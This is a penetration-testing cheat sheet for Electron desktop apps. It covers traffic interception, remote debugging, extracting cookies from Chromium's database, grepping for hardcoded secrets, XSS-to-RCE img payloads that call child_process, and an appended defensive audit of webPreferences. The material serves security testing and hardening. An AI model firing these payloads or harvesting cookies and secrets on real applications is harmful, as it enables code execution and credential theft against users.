Electron (formerly known as Atom Shell) is a software framework developed and maintained by GitHub for building desktop applications using JavaScript, HTML, and CSS. By embedding Chromium (browser engine) and Node.js (backend) into its binary, Electron lets developers maintain a single JavaScript codebase and build cross-platform apps that run on Windows, macOS, and Linux without native development. It also exposes APIs for native integration with Node services and an inter-process communication (IPC) module.
- Official Documentation
- Electron (software framework) (Wikipedia)
- Process Model
- An Intro To Electron Application Penetration Testing
- XSS to RCE Electron Desktop Apps (HackTricks)
Intercept HTTP requests
You need to add Burp’s certificate to the Windows Trust Store or to Mac OS’ Keychain. See Burp Suite.
Start Burp Suite to intercept requests.
Windows – Start the application using a proxy
ElectronApp.exe --proxy-server=127.0.0.1:8080
Mac OS – Start the application using a proxy
cd ElectronApp.app/Contents/MacOS
./ElectronApp --proxy-server=127.0.0.1:8080
Debugging with Chrome’s DevTools
ElectronApp.exe --remote-debugging-port=54321
- Start Chrome and go to chrome://inspect
- Under Devices, click Discover network targets -> Configure
- Add localhost:54321 (no need to select Enable port forwarding) and click Done
- Under Remote Targets, the application should appear
- Click on Inspect
Find Electron version
In the DevTools, go to the Console tab and run one of the following. Then check which security advisories apply to that version.
navigator.userAgent
navigator.userAgent.match(/Electron\/([\d\.]+\d+)/)[1]
Cookies
Since Electron applications use Chromium, cookies are stored in:
Windows
C:\Users\<username>\AppData\Roaming\<app name>\Network\Cookies
Mac OS
/Users/<username>/Library/Application Support/<app name>/Cookies
Show cookies
This is a SQLite file. Transfer the file to Kali and extract the cookies. Cookies that Chromium stored encrypted have an empty value column; their ciphertext is in the encrypted_value column instead.
sqlite3 Cookies "select name || ' = ' || value from cookies"
Show stack trace for warnings
ElectronApp.exe --trace-warnings
Sensitive Information
Look for hardcoded passwords or keys
grep -Ri "pass" ./
grep -Ri "key" ./
Known vulnerabilities
Identify known vulnerabilities in the project’s dependencies
npm i --package-lock-only
npm audit
XSS
XSS to RCE
Windows payloads
<img src=x onerror="alert(require('child_process').execSync('calc').toString());">
<img src=x onerror=alert(require('child_process').exec('calc')); />
Linux & Mac OS payloads
<img src=x onerror="alert(require('child_process').execSync('gnome-calculator').toString());">
<img src=x onerror="alert(require('child_process').execSync('id').toString());">
<img src=x onerror="alert(require('child_process').execSync('ls -l').toString());">
<img src=x onerror="alert(require('child_process').execSync('uname -a').toString());">
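The defender-side counterpart to the version check and the XSS-to-RCE payloads above, as an added example that is not code from this page or from Electron: a null-safe version of the userAgent one-liner, and an audit of a BrowserWindow webPreferences object for the settings that let a renderer XSS reach Node APIs. The user agent, the two webPreferences objects and the function names are constructed for the example.

```javascript
// Added example, not code from the page or from Electron: a null-safe version
// of the userAgent one-liner and an audit of BrowserWindow webPreferences for
// the settings that let a renderer XSS reach Node APIs. Plain Node, no Electron.

// Electron version string from a user agent, or null for a non-Electron UA
// (the page's one-liner throws a TypeError in that case).
function electronVersion(ua) {
  const m = /Electron\/(\d+(?:\.\d+)*)/.exec(ua || '');
  return m ? m[1] : null;
}

function electronMajor(ua) {
  const v = electronVersion(ua);
  return v === null ? null : parseInt(v.split('.')[0], 10);
}

// Effective security-relevant webPreferences for an Electron major version,
// filling in the defaults Electron ships: nodeIntegration off since 5,
// contextIsolation on since 12, sandbox on since 20.
function effectivePrefs(prefs, major) {
  const p = prefs || {};
  return {
    nodeIntegration: p.nodeIntegration ?? (major < 5),
    contextIsolation: p.contextIsolation ?? (major >= 12),
    sandbox: p.sandbox ?? (major >= 20),
    webSecurity: p.webSecurity ?? true,
    allowRunningInsecureContent: p.allowRunningInsecureContent ?? false,
  };
}

// Findings that make an XSS in this window worse than a DOM problem; an empty
// list means the window follows the Electron security checklist on these points.
function auditWebPreferences(prefs, major) {
  const e = effectivePrefs(prefs, major);
  const findings = [];
  if (e.nodeIntegration) findings.push('nodeIntegration enabled: page scripts can call require()');
  if (!e.contextIsolation) findings.push('contextIsolation disabled: page scripts share the preload world');
  if (!e.sandbox) findings.push('sandbox disabled: renderer runs without the OS sandbox');
  if (!e.webSecurity) findings.push('webSecurity disabled: same-origin policy is off');
  if (e.allowRunningInsecureContent) findings.push('allowRunningInsecureContent: mixed content allowed');
  return findings;
}

// Constructed sample input (not captured from a real application).
const SAMPLE_UA = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) ' +
  'MyApp/1.0.0 Chrome/91.0.4472.164 Electron/13.1.7 Safari/537.36';
const vulnerablePrefs = { nodeIntegration: true, contextIsolation: false };
const hardenedPrefs = { nodeIntegration: false, contextIsolation: true, sandbox: true };

console.log(auditWebPreferences(vulnerablePrefs, electronMajor(SAMPLE_UA)));
```

Run it against the webPreferences found in the app's main-process code (inside app.asar) together with the version read from DevTools; the payloads above only work when the first two findings are present.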